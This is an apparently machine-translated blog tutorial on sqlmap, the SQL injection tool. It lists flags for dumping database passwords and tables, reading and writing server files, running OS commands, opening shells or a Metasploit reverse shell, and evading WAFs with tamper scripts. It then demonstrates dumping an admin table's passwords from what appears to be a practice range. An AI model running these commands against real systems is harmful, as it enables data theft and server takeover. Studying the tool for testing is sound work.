Preface ：

Sqlmap It is a necessary tool for every penetration test engineer .

One 、Sqlmap What is it? ？

In this era of priceless data, database security has become the top priority , So I sorted out the most commonly used parameters . Penetration testing tools for database security sqlmap Use .

sqlmap It's an automated sql Injection penetration tool , Fingerprint detection 、 Injection mode 、 Data retrieval after successful injection is automated ,sqlmap There are also many scripts . But it is basically not used in practical testing .sqlmap It's using python Developed . Capable people can write their own scripts .

sqlmap Support MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase and SAP MaxDB And other database security vulnerabilities detection .

Two 、Sqlmap Use steps ：

1. The basic parameters ：

-u # Injection point
-g Google search
-f # Fingerprint identification database type
-b # Get database version information
-p # Specify testable parameters (?page=1&id=2 -p “page,id”)
-D “” # Specify the database name
-T “” # Specified table name
-C “” # Specified field
-s “” # Save the injection process to a file , Can also interrupt , The next recovery is injection ( preservation ：-s “xx.log”　　 recovery :-s “xx.log” –resume)
–columns # List fields
–current-user # Get the current user name
–current-db # Get the current database name
–users # Column database all users
–passwords # All passwords of database users
–privileges # View user permissions (–privileges -U root)
-U # Specify the database user
–dbs # List all databases
–tables -D “” # Lists the tables in the specified database
–columns -T “user” -D “mysql” # List mysql In the database user All fields of the table
–dump-all # List all databases, all tables
–exclude-sysdbs # Only the new databases and tables created by users are listed
–dump -T “” -D “” -C “” # Lists the data for the fields of the table in the specified database (–dump -T users -D master -C surname)
–dump -T “” -D “” –start 2 –top 4 # List the tables of the specified database 2-4 Field data
–dbms # Specify database (MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
–os # Specify the system (Linux,Windows)
–sql -shell Write shell
–delay Delay time
–safe-freq frequency
-v # The level of detail (0-6)
0： Display only Python Backtracking , Errors and key messages .
1： Display messages and warning messages .
2： Show debug messages .
3： Payload Injection .
4： Show HTTP request .
5： Show HTTP Response head .
6： Show HTTP The content of the response page
–privileges # View permissions
–is-dba # Whether you are a database administrator
–roles # Enumerate database user roles
–udf-inject # Import user defined functions （ Get system permissions ）
–union-check # Do you support union Inject
–union-cols #union Query table record
–union-test #union Statement test
–union-use # use union Inject
–union-tech orderby #union coordination order by
–method “POST” –data “” #POST How to submit data (–method “POST” –data “page=1&id=2″)
–cookie “ use ; Separate the numbers ” #cookie Inject (–cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
–referer “” # Use referer cheating (–referer “http://www.baidu.com”)
–user-agent “” # Customize user-agent
–proxy “http://127.0.0.1:8118″ # Agent injection
–string “” # Specify keywords
–threads 　　 # Using multithreading (–threads 3)
–sql-shell # Execute assignment sql command
–sql-query # Execute specified sql sentence (–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ )
–file-read # Read the specified file
–file-write # Write to local file (–file-write /test/test.txt –file-dest /var/www/html/1.txt; Local test.txt The file is written to the 1.txt)
–file-dest # The absolute path of the file to be written
–os-cmd=id # Execute system commands
–os-shell # System interaction shell
–os-pwn # rebound shell(–os-pwn –msf-path=/opt/framework/msf3/)
–msf-path= #matesploit Absolute path (–msf-path=/opt/framework/msf3/)
–os-smbrelay #
–os-bof #
–reg-read # Read win System registry
–priv-esc #
–time-sec= # Delay settings Default –time-sec=5 by 5 second
-p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)” # Appoint user-agent Inject
–eta # Blind note
/pentest/database/sqlmap/txt/
common-columns.txt　　 Field Dictionary
common-outputs.txt
common-tables.txt Table dictionary
keywords.txt
oracle-default-passwords.txt
user-agents.txt
wordlist.txt

Practical operation (windows demonstration )：

Range recommendation ：https://hack.zkaq.cn/

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"

Next, query the database name ：

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dbs

Through the query, we get 3 Databases ：information_schema,maoshe,test.

The code of the query table is as follows ：

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe --tables

We can know by inquiry that maoshe Under the library 4 A watch admin,dirs,news,xss.

Query all column names of the table

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin --columns

We can know by inquiry that admin There are two columns below the table column,type.

Query data ( For short, the order to eat prison food )：

The code is as follows （ Example ）：

python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C password --dump

Extension instructions ：

 command ：--proxys, effect ： Use agents to run target websites . grammar ：python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --proxy="http://127.0.0.1:8087/" 
 command ：--random-agent , effect ： Use different user agent headers . grammar ：python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --proxy="http://127.0.0.1:8087/" --random-agent
 command ：--cookie, effect ： Use the identity of the website to penetrate the target .python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --cookie="A=14; jwt_id=10225; hyphp_lang=zh-CN; PHPSESSID=l88pctr08m1goksmt490ucqoec; Track_HEX=bptp%252B0qqBV3OTRLgJTnOdWYZg1Ht%25252FJZ1KsnKyK417OavpiHxZ%252BaTI4QERFEDhOehx%25252FFmM2XDdAetlserL65nSVF22msWlo6qytqaJvebChhDDbuiXJ9ghGMJBD6M0A30r%25252FN6etw8lwT17k%25252FlPf19i5HmXUM%253D; token=79995007156da9089ba3e8bfb784fc7c34c20f84; jwt_time=1649140798"
 command ：--level , effect ： Increase the intensity of attack .
		 The higher the strength , The longer the time , The higher the probability of discovering vulnerabilities .
 command ：--risk , effect ： Set the risk level .
	 grammar ：python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --level 3 --risk 2
 command ：--batch  , effect ： Default choice   y/n
	python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --level 3 --risk 2  --batch
 command ：--tamper, effect ： Use scripts , Bypass IPS、WAF etc. . grammar ：python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --tamper="tamper/between.py" 

summary

The above is the content of this chapter , Mainly about sqlmap What is it and how to use it . Please like it .